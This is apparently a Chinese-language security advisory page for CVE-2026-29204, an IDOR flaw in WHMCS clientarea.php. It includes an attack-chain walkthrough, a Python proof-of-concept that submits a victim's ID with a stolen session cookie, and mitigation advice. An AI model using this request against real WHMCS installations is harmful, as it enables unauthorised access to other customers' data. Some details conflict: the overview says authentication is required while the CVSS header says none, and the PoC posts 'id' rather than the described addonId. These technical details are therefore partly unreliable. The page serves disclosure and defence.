CVE-2026-29204 CVSS 9.1 严重

CVE-2026-29204 WHMCS客户端区域权限绕过漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29204

漏洞类型

权限绕过/IDOR

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WHMCS

漏洞概述

WHMCS客户管理系统中存在一个严重的安全漏洞，源于clientarea.php文件中缺乏足够的所有权检查机制。该漏洞允许经过身份验证的客户端区域用户，在未经验证的情况下提交包含其他用户addonId的请求。攻击者可利用此缺陷绕过访问控制，未经授权地访问受害者账户并执行敏感操作。该漏洞CVSS v3.1评分为9.1，属于严重级别，对系统的机密性和完整性构成极高威胁。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）。在WHMCS的clientarea.php处理逻辑中，当用户通过接口提交与服务附加项相关的请求时，系统仅接收并处理请求中的addonId参数，而未在服务器端执行关键的所有权校验步骤，即未验证当前登录会话的用户ID是否与该addonId所属的用户ID相匹配。因此，攻击者只需拥有一个普通的客户端账户登录凭证，即可通过拦截并篡改HTTP请求包，将addonId替换为目标受害者的ID。由于缺乏后端验证，服务器会误认为该操作是由资源所有者发起的，从而允许攻击者读取、修改或删除受害者的资源，实现水平越权攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标的WHMCS系统，并注册获取一个普通客户端用户账号。

STEP 2

身份验证

攻击者使用该账号登录系统，获取有效的会话Cookie。

STEP 3

漏洞利用

攻击者截获向clientarea.php发送的请求，将参数中的addonId修改为其他受害者的ID并发送。

STEP 4

权限获取

服务器由于未校验所有权，接受了请求，攻击者成功未经授权访问或篡改受害者数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://example.com/clientarea.php"
session_cookie = "whmcs_session_id_here"
victim_addon_id = "12345"  # The addon ID belonging to the victim

# Headers to simulate an authenticated user
headers = {
    "Cookie": f"PHPSESSID={session_cookie}",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

# Payload data submitting the victim's addonId
payload = {
    "action": "details",
    "id": victim_addon_id, # Vulnerable parameter: Insufficient ownership check
    "submit": "Submit Request"
}

try:
    response = requests.post(target_url, data=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response snippet: {response.text[:200]}...")
    else:
        print(f"[-] Failed to send request. Status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

WHMCS (具体受影响版本未在提供信息中披露)

防御指南

临时缓解措施

建议立即审查WHMCS官方针对CVE-2026-29204的安全公告并应用补丁。在升级前，可以通过部署Web应用防火墙（WAF）规则，监控并阻断针对clientarea.php的异常参数传递，特别是对addonId等敏感ID参数的篡改行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-29204
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-29204
3 Details https://www.cvedetails.com/cve/CVE-2026-29204/
4 VulDB https://vuldb.com/cve/CVE-2026-29204
5 Link https://help.whmcs.com/m/125386/l/2073908-cve-2026-29204

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表